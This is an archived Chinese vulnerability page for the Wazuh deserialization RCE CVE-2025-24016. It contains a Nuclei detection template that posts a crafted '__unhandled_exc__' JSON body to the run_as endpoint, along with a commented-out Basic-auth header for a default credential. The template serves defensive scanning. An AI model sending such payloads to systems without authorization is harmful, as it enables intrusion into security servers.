关联漏洞
标题:
Wazuh服务器远程代码执行漏洞
(CVE-2025-24016)
描述:Wazuh是一款用于威胁预防、检测和响应的免费开源平台。在版本4.4.0至4.9.1之间的Wazuh服务器中,存在一个不安全的反序列化漏洞,允许远程代码执行。DistributedAPI参数被序列化为JSON,并通过`as_wazuh_object`(位于`framework/wazuh/core/cluster/common.py`)进行反序列化。如果攻击者成功在DAPI请求/响应中注入未经检查的字典,他们可以伪造一个未处理的异常(`__unhandled_exc__`),从而执行任意Python代码。该漏洞可以通过任何拥有API访问权限的人(被攻破的控制台或集群中的Wazuh服务器)触发,在某些配置下,甚至可以通过被攻破的代理触发。版本4.9.1中已经修复了该漏洞。
介绍
# CVE-2025-24016 Wazuh Unsafe Deserialization RCE Detection
This repository contains a Nuclei template to detect the unsafe deserialization vulnerability in Wazuh servers, identified as **CVE-2025-24016**.
## Template Details
```yaml
id: wazuh-unsafe-deserialization
info:
name: "Wazuh Unsafe Deserialization RCE Detection"
author: "Hüseyin TINTAŞ"
severity: critical
description: |
This template detects an unsafe deserialization vulnerability in Wazuh servers.
The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class
("NotARealClass") to generate a NameError. A NameError in the response indicates that the
payload reached the vulnerable deserialization function.
tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
reference:
- https://documentation.wazuh.com/
requests:
- method: POST
path:
- "{{BaseURL}}/security/user/authenticate/run_as"
headers:
Content-Type: application/json
# If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
# Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
matchers:
- type: status
status:
- 500
- type: word
part: body
words:
- "NameError"
```
## Usage
```bash
nuclei -t CVE-2025-24016.yaml -u http://example.com
```
## Contact
For any inquiries or further information, you can reach out to me through:
- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
文件快照
[4.0K] /data/pocs/c4d655b54017657fc1205124fb7ca047d8a29c91
├── [1.3K] CVE-2025-24016.yaml
└── [1.8K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。